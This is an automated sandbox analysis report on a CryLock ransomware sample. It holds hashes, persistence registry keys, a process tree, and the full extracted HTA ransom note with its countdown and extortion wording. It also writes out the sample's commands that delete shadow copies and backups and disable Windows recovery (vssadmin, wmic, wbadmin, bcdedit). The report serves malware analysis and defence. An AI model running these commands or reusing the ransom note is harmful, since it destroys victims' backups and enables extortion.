Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64 arch:x86 image:win7-20231129-en locale:en-us os:windows7-x64 system -
submitted
31-12-2023 08:32
Behavioral task
behavioral1
Sample
2f2d4eb24662c916f822f9c3fd55c9b2.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
2f2d4eb24662c916f822f9c3fd55c9b2.exe
Resource
win10v2004-20231215-en
General
-
Target
2f2d4eb24662c916f822f9c3fd55c9b2.exe
-
Size
206KB
-
MD5
2f2d4eb24662c916f822f9c3fd55c9b2
-
SHA1
9d5bda347f70b8f928803a28782a1018d9f2d0e0
-
SHA256
4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba
-
SHA512
1cc68736ac883a60f1113f183fa68b344b86dffc6b3853dbabbc626eb02fd69b9eb3801891c07193ab3684419e7346d4a1d0c37a5de6523df0dabae1b0051bb5
-
SSDEEP
3072:0bOTRwYckApvw14pcODvX/kyeAYcWNzs2C3Zm4YSYoj1ZYJJCpdXfabI8AKgcJuU:wOsZiKRJWWY1dJJQdHrYuFC
Malware Config
Extracted
crylock
- emails
-
ransomnote
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <title>CryLock</title> <hta:application showInTaskBar="no" APPLICATION="yes" ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no" applicationname="CryLock" border="thick" contexmenu="no" scroll="no" selection="yes" singleinstance="yes" windowstate="normal" MAXIMIZEBUTTON="NO" BORDER="DIALOG" width="100" height="100" MINIMIZEBUTTON="NO"></hta:application> <script language="JavaScript"> var max_discount = 50; var start_date = new Date('<%START_DATETIME%>'); var discount_date = new Date('<%DOUBLE_DATETIME%>'); var end_date = new Date('<%UNDECRYPT_DATETIME%>'); var main_contact = '<%MAIN_CONTACT%>'; var hid = '[<%HID%>]'; var second_contact = '<%RESERVE_CONTACT%>'; var sd = end_date; var dn = new Date(); var zoc, ddGlobal; function document.onblur() { alert('Attention! This important information for you!'); } function setContacts() { document.getElementById('main_contact').innerHTML = main_contact; document.getElementById('second_contact').innerHTML = second_contact; document.getElementById('hid').innerHTML = hid; } function countDiscount() { var term_current = new Date().getTime() - start_date.getTime(); var term_full = discount_date.getTime() - start_date.getTime(); var delta = discount_date.getTime() - new Date().getTime(); delta = new Date(delta); var dt = document.getElementById('pwr'); var timer_discount = document.getElementById('timer_discount'); var discount = document.getElementById('discount'); var hours_to_end = Math.floor(term_full / 1000 / 3600); var hours_current = Math.floor(term_current / 1000 / 3600); if (discount_date.getTime() > dn.getTime()) { var disc_per_hour = parseFloat(max_discount / hours_to_end).toFixed(2); var cur_discount = Math.floor(max_discount - (disc_per_hour * hours_current)); if (discount) { discount.innerHTML = cur_discount + '% discount'; } } if (cur_discount <= 25) { dt.style.cssText = 'border: 1px solid #FFC000;'; if 
(timer_discount) { timer_discount.style.background = '#FFC000'; } } if (sd.getTime() < dn.getTime() || cur_discount < 5) { dt.style.cssText = 'border: 1px solid #F53636; background-color: #F53636; padding: 16px 20px;'; dt.innerHTML = '<div style="font-size: 16px; color: #ffffff; text-align: center; display: block; font-weight: bold;">Decryption key can be bought at standard cost.</div><div style="font-size: 13px; color: #fff; text-align: center; margin-top: 10px">You need to hurry up to decrypt your data because all your files will be destroyed soon.</div>'; } var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } if (timer_discount) { timer_discount.innerHTML = dd + ' ' + hh+':'+mm+':'+ss; } } function ChangeTime() { var sd = end_date; var dn = new Date(); if (sd.getTime() < dn.getTime()) { var dt = document.getElementById('lctw'); dt.innerHTML = '<b>Soon, you won\'t be able to decrypt your files. 
Contact us immediately!</b>'; dt.style.cssText = 'background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px; text-align: center; font-size: 20px;'; zoc = 2; } else { var delta = sd.getTime() - dn.getTime(); delta = new Date(delta); var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); ddGlobal = parseInt(dd); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt = document.getElementById('file_lost'); if (dt) { dt.innerHTML= dd+' '+hh+':'+mm+':'+ss; } } } var count = 100, interval = 10, intervalID; function blink() { if (ddGlobal == 0 && zoc != 2) { var dt = document.getElementById('file_lost'); var dt2 = document.getElementById('text_file_lost'); var test = document.getElementById('test'); if (count == 100) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count - 2; if (count == 20) clearInterval(intervalId); }, interval); } if (count == 20) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count + 2; if (count == 100) clearInterval(intervalId); }, interval); } } } function getRandomArbitrary(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } function Rndom() { var dt=document.getElementById('rc'); var xx=''; var i=0; while (i < 40) { xx=xx+getRandomArbitrary(0,2); i=i+1; } rc.innerHTML= xx; } function Start() { window.resizeTo(850,720); setContacts(); ChangeTime(); setInterval(ChangeTime, 1000); countDiscount(); setInterval(countDiscount, 1000); setInterval(blink, 100); setInterval(Rndom,100); } function copytext(s) { window.clipboardData.setData("Text",s); alert(s+' copied to clipboard'); } 
function Restart() { alert('Attention! This important information for you!'); } </script> <body style="background: #000; font: 12px 'Arial', sans-serif; padding: 0; margin: 0;" onload="Start();"> <div style="height: 100%; position: absolute; top: 0; left: 0; background-color: #ffffff; box-sizing: border-box; padding: 20px; overflow-x: hidden;overflow-y: hidden;"> <div style="background-color: #000000; width: 100%; height: 55px;" id="header"> <div style="color: #F53636; font-weight: bold; font-size: 40px; text-transform: uppercase; line-height: 54px; padding-left: 8px; float: left;">ENCRYPTED</div> <div style="font-size: 18px; color: #7E7E7E; float: right; line-height: 55px; padding-right: 17px;" id="rc">11100001111011111111100001111011111100</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> <div> <div style="float: left; width: 144px; height: 110px; background-color: #000000; color: #ffffff; text-align: center; line-height: 1;"> <b style="display: block; font-size: 43px; margin-top: 24px;">What</b> <b style="display: block; font-size: 20px;">happened?</b> </div> <div style="float: right; width: 630px;"> <b style="font-size: 13px; color: #F53636;">All your documents, databases, backups, and other critical files were encrypted.</b> <div>Our software used the AES cryptographic algorithm (you can find related information in Wikipedia).</div> <br> <div>It happened because of security problems on your server, and you cannot use any of these files anymore. The only way to recover your data is to buy a decryption key from us. 
</div> <br> <div>To do this, please send your unique ID to the contacts below.</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> </div> <div> <div style="float: left; width: 540px;"> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(main_contact)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">E-mail:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="main_contact"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(hid)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">Unique ID:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="hid"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="margin-top: 17px; line-height: 18px;">Right after payment, we will send you a specific decoding software that will decrypt all of your files. 
If you have not received the response within 24 hours, please contact us by e-mail <span style="text-decoration: underline;" OnClick="copytext(second_contact)" id="second_contact"></span>.</div> </div> <div style="float: right; width: 230px;"> <div style="border: 1px solid #2FAB61;" id="pwr"> <div style="padding: 13px 14px 3px 14px; text-align: center; font-size: 14px;">During a short period, you can buy a decryption key with a </div> <div style="font-size: 25px; text-align: center; display: block; font-weight: bold;" id="discount">50% discount</div> <div id="timer_discount" style="margin-top: 10px; background-color: #219653; padding: 5px 0; text-align: center; font-size: 25px; font-weight: bold; color: #ffffff;">--:--:-- left</div> </div> <div style="margin-top: 17px; line-height: 18px;">The price depends on how soon you will contact us.</div> </div> <div style="clear: both; float: none;"></div> </div> <div style="background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px" id="lctw"> <div style="float: left; font-size: 20px; padding-top: 3px;" id="text_file_lost">All your files will be deleted permanently in:</div> <div style="float: right; font-size: 25px;" id="file_lost"></div> <div style="clear: both; float: none;"></div> </div> <div> <div style="float: left; width: 540px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">Attention! 
<div id="test"></div></b> <ul style="list-style: none; padding: 0; margin: 0;"> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not try to recover files yourself.</span> this process can damage your data and recovery will become impossible.</li> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not waste time trying to find the solution on the Internet.</span> The longer you wait, the higher will become the decryption key price.</li> <li style="position: relative; padding-left: 20px; font-size: 12px margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not contact any intermediaries.</span> They will buy the key from us and sell it to you at a higher price.</li> </ul> </div> <div style="float: right; width: 230px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">What guarantees do you have?</b> <div>Before payment, we can decrypt three files for free. The total file size should be less than 5MB (before archiving), and the files should not contain any important information (databases, backups, large tables, etc.)</div> </div> <div style="clear: both; float: none;"></div> </div> </div> </body> </html>
Extracted
C:\$Recycle.Bin\S-1-5-21-3627615824-4061627003-3019543961-1000\how_to_decrypt.hta
Signatures
-
Crylock
Ransomware family that is a newer variant of the Cryakl ransomware.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery. In this run the backup catalog is also removed with wbadmin (DELETE BACKUP and DELETE SYSTEMSTATEBACKUP), and Windows recovery is disabled with bcdedit (recoveryenabled No, bootstatuspolicy ignoreallfailures), as shown in the process tree below.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials and other sensitive items.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
2f2d4eb24662c916f822f9c3fd55c9b2.exe
description ioc process
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\8D4A7D42-0DE8844C = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\2f2d4eb24662c916f822f9c3fd55c9b2.exe\" -id \"8D4A7D42-0DE8844C\" -wid \"vis\"" 2f2d4eb24662c916f822f9c3fd55c9b2.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\398670 = "398670" 2f2d4eb24662c916f822f9c3fd55c9b2.exe -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Drops desktop.ini file(s) 37 IoCs
Processes:
2f2d4eb24662c916f822f9c3fd55c9b2.exedescription ioc process File opened for modification \??\c:\users\admin\appdata\local\microsoft\windows mail\stationery\Desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\recorded tv\sample media\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\feeds cache\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\documents\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\favorites\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\pictures\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\documents\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\videos\sample videos\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\feeds cache\0u93yk0n\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\feeds cache\27pkr52p\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\music\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\desktop\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\downloads\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\links\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification 
\??\c:\users\admin\favorites\links for united states\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\default\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\pictures\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\pictures\sample pictures\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\recorded tv\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\f:\$recycle.bin\s-1-5-21-3627615824-4061627003-3019543961-1000\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\feeds cache\bp3uabcb\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\appdata\local\microsoft\feeds cache\fw0p2mzh\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\contacts\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\searches\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\videos\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\music\sample music\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\videos\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\desktop\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\$recycle.bin\s-1-5-21-3627615824-4061627003-3019543961-1000\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File 
opened for modification \??\c:\users\admin\favorites\links\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\admin\saved games\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\downloads\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\libraries\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe File opened for modification \??\c:\users\public\music\desktop.ini 2f2d4eb24662c916f822f9c3fd55c9b2.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
2f2d4eb24662c916f822f9c3fd55c9b2.exe
description ioc process
File opened (read-only) \??\F: 2f2d4eb24662c916f822f9c3fd55c9b2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery. Here they are deleted through vssadmin.exe (PID 2552) and, via a second cmd.exe, WMIC.exe (PID 2692), as shown in the process tree below.
Processes:
vssadmin.exe
pid process
2552 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
2f2d4eb24662c916f822f9c3fd55c9b2.exe
pid process
2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe
2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
WMIC.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 2692 WMIC.exe Token: SeSecurityPrivilege 2692 WMIC.exe Token: SeTakeOwnershipPrivilege 2692 WMIC.exe Token: SeLoadDriverPrivilege 2692 WMIC.exe Token: SeSystemProfilePrivilege 2692 WMIC.exe Token: SeSystemtimePrivilege 2692 WMIC.exe Token: SeProfSingleProcessPrivilege 2692 WMIC.exe Token: SeIncBasePriorityPrivilege 2692 WMIC.exe Token: SeCreatePagefilePrivilege 2692 WMIC.exe Token: SeBackupPrivilege 2692 WMIC.exe Token: SeRestorePrivilege 2692 WMIC.exe Token: SeShutdownPrivilege 2692 WMIC.exe Token: SeDebugPrivilege 2692 WMIC.exe Token: SeSystemEnvironmentPrivilege 2692 WMIC.exe Token: SeRemoteShutdownPrivilege 2692 WMIC.exe Token: SeUndockPrivilege 2692 WMIC.exe Token: SeManageVolumePrivilege 2692 WMIC.exe Token: 33 2692 WMIC.exe Token: 34 2692 WMIC.exe Token: 35 2692 WMIC.exe Token: SeBackupPrivilege 2304 vssvc.exe Token: SeRestorePrivilege 2304 vssvc.exe Token: SeAuditPrivilege 2304 vssvc.exe Token: SeIncreaseQuotaPrivilege 2692 WMIC.exe Token: SeSecurityPrivilege 2692 WMIC.exe Token: SeTakeOwnershipPrivilege 2692 WMIC.exe Token: SeLoadDriverPrivilege 2692 WMIC.exe Token: SeSystemProfilePrivilege 2692 WMIC.exe Token: SeSystemtimePrivilege 2692 WMIC.exe Token: SeProfSingleProcessPrivilege 2692 WMIC.exe Token: SeIncBasePriorityPrivilege 2692 WMIC.exe Token: SeCreatePagefilePrivilege 2692 WMIC.exe Token: SeBackupPrivilege 2692 WMIC.exe Token: SeRestorePrivilege 2692 WMIC.exe Token: SeShutdownPrivilege 2692 WMIC.exe Token: SeDebugPrivilege 2692 WMIC.exe Token: SeSystemEnvironmentPrivilege 2692 WMIC.exe Token: SeRemoteShutdownPrivilege 2692 WMIC.exe Token: SeUndockPrivilege 2692 WMIC.exe Token: SeManageVolumePrivilege 2692 WMIC.exe Token: 33 2692 WMIC.exe Token: 34 2692 WMIC.exe Token: 35 2692 WMIC.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
2f2d4eb24662c916f822f9c3fd55c9b2.execmd.execmd.exedescription pid process target process PID 2364 wrote to memory of 2808 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2808 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2808 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2808 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2424 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2424 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2424 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2424 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2740 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2740 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2740 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2740 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2808 wrote to memory of 2552 2808 cmd.exe vssadmin.exe PID 2808 wrote to memory of 2552 2808 cmd.exe vssadmin.exe PID 2808 wrote to memory of 2552 2808 cmd.exe vssadmin.exe PID 2808 wrote to memory of 2552 2808 cmd.exe vssadmin.exe PID 2364 wrote to memory of 2772 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2772 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2772 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2772 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2608 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2608 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2608 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2608 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote 
to memory of 2672 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2672 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2672 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2364 wrote to memory of 2672 2364 2f2d4eb24662c916f822f9c3fd55c9b2.exe cmd.exe PID 2772 wrote to memory of 2692 2772 cmd.exe WMIC.exe PID 2772 wrote to memory of 2692 2772 cmd.exe WMIC.exe PID 2772 wrote to memory of 2692 2772 cmd.exe WMIC.exe PID 2772 wrote to memory of 2692 2772 cmd.exe WMIC.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2f2d4eb24662c916f822f9c3fd55c9b2.exe"C:\Users\Admin\AppData\Local\Temp\2f2d4eb24662c916f822f9c3fd55c9b2.exe"1⤵
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"2⤵PID:2672
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No"2⤵PID:2608
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "wmic SHADOWCOPY DELETE"2⤵
- Suspicious use of WriteProcessMemory
PID:2772
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "wbadmin DELETE BACKUP -keepVersions:0"2⤵PID:2740
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0"2⤵PID:2424
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "vssadmin delete shadows /all /quiet"2⤵
- Suspicious use of WriteProcessMemory
PID:2808
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic SHADOWCOPY DELETE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet1⤵
- Interacts with shadow copies
PID:2552
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
930B
MD5 29f138787258ee0e5674a096a974f0b4
SHA1 10128b0fc4fa700058eac57507c64519f3d88bd5
SHA256 d5c16309e92125f34dfea9c92bbcd3ebda678a2d47d2cb71b8bc155f2de3a138
SHA512 c34c1935d189c74bf50175e6b353cf2aa0af88727df000552dab6458d4038119143f1f4c6f00c0a802985dfc1f3ad342b147df368b4f0444c0a48e7ba12923cd
-
Filesize
13KB
MD5 cd4a8374f936473253e26b52f2034052
SHA1 c1f87c822fdea80050309321e9ae0eff6f8045f6
SHA256 07e83520efab44b2f9dd946a9f6f260c2160092896fd33c3230b6db713732970
SHA512 4a0800e5f62e74a8dd9ffa7c5a0f3670360a08eac0b2f2bec4d0ecafc02da0a3342da8ab827a79a79144a7af4612e715fa4679120b1f379af378dd2dbe9f72d3
-
Filesize
4KB
MD5 5ace3207bc8d4634b193d63e0213bc72
SHA1 2c9197ab29078a250ef8df45b66411c9e8cdce59
SHA256 8db4c530a10003808eabe2da24530ef50747f35549be1f8be9e998e97613efe1
SHA512 119a4da1f6725d615bdcb0a583b46664068ecf0eb6761d15d948b79439d51578c665543359e591ec94fdcbc8ff04cadd8e3455856f9780340ce6d56182c0daa3